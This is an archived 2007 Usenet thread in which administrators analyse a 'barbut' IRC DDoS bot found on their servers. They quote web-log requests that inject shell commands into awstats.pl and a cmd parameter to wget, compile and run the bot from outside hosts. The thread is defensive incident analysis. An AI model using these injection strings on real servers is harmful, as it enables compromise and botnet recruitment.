Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

Re: barbut process using 100% cpu and connecting

56 views
Skip to first unread message

A

unread,
Nov 19, 2007, 4:03:01 AM11/19/07
to
A long gap since this post, but I've just noticed "barbut" in our web
server logs, googled, and found nothing but this query:

On Jul 16, 6:15pm Jens Hoffman wrote:

> krzysiek schrieb:

> > there was a process called "barbut" (2 of them) using 49,2% CPU time
> > each :O
> > meanwhile netstat showed established connections to 195.73.177.146:666
> > + several waiting.
> Some host in .nl.
> > I have no idea where did this process come from. Any clues?
> I don't know about you, but I would take the machine off the net and
> try to understand what happened.


I hope the original poster did that - here's the "barbut" occurrence in
our apache log:

GET /awstats.pl?configdir=|echo;cd%20/tmp;wget%20217.79.176.126/barbut;chmod%20755%20barbut;./barbut;
echo| HTTP/1.1

(there are four attempts, trying different paths to awstats.pl)

I did the wget, and it's a 30KB ELF executable. 'nm' shows such things as
'flooders', 'getspoofs', 'changeservers' ... I don't think I'll run it ;-)

Googling for some of those names finds this is probably the source code:

http://packetstormsecurity.nl/irc/kaiten.c

The comments start:

"This is a IRC based distributed denial of service client. It connects
to the server specified below and accepts commands via the channel
specified."

Hope this was useful,
A.

ale2007

unread,
Nov 20, 2007, 2:46:59 AM11/20/07
to
On 19 Nov, 10:03, "A" <a...@nospam.com> wrote:
> Googling for some of those names finds this is probably the source code:
>
> http://packetstormsecurity.nl/irc/kaiten.c

I've found similar requests in yesterdays log (19/Nov/2007:20:02:53
+0100)
"GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f
barbut;wget http://crekom.com/barbut.c;gcc barbut.c -o barbut;./
barbut ; HTTP/1.1"

W.r.t. the sources mentioned above, barbut.c has been changed,
including the following differences:

* The CHAN (channel to join) changed from "#whatever" to "#whatever1"
* The server list has been replaced by the single entry
"217.79.176.126"
* The initial connection was has changed from port 6667 to port 113
* The "run command" macro has changed from "SH <cmd>" to "ZK <cmd>"
* The MODE sent by func _376 has changed from "MODE %s -xi" to "MODE
%s +iwx"

That didn't apparently succeed, so I don't know who are the victims...

Peder.R...@gmail.com

unread,
Nov 21, 2007, 3:02:09 PM11/21/07
to
On Nov 20, 1:46 am, ale2007 <ves...@tana.it> wrote:
> On 19 Nov, 10:03, "A" <a...@nospam.com> wrote:
>
> > Googling for some of those names finds this is probably the source code:
>
> > http://packetstormsecurity.nl/irc/kaiten.c
>
> I've found similar requests in yesterdays log (19/Nov/2007:20:02:53
> +0100)
> "GET ?=?&cmd=cd /tmp;killall -9 barbut;rm -f barbut.c;rm -f
> barbut;wgethttp://crekom.com/barbut.c;gccbarbut.c -o barbut;./

> barbut ; HTTP/1.1"
>
> W.r.t. the sources mentioned above, barbut.c has been changed,
> including the following differences:
>
> * The CHAN (channel to join) changed from "#whatever" to "#whatever1"
> * The server list has been replaced by the single entry
> "217.79.176.126"
> * The initial connection was has changed from port 6667 to port 113
> * The "run command" macro has changed from "SH <cmd>" to "ZK <cmd>"
> * The MODE sent by func _376 has changed from "MODE %s -xi" to "MODE
> %s +iwx"
>
> That didn't apparently succeed, so I don't know who are the victims...

I found the same connection to my Imail server and Sophos posted this
a few minutes ago.

http://www.sophos.com/security/analyses/trojkaitenw.html

0 new messages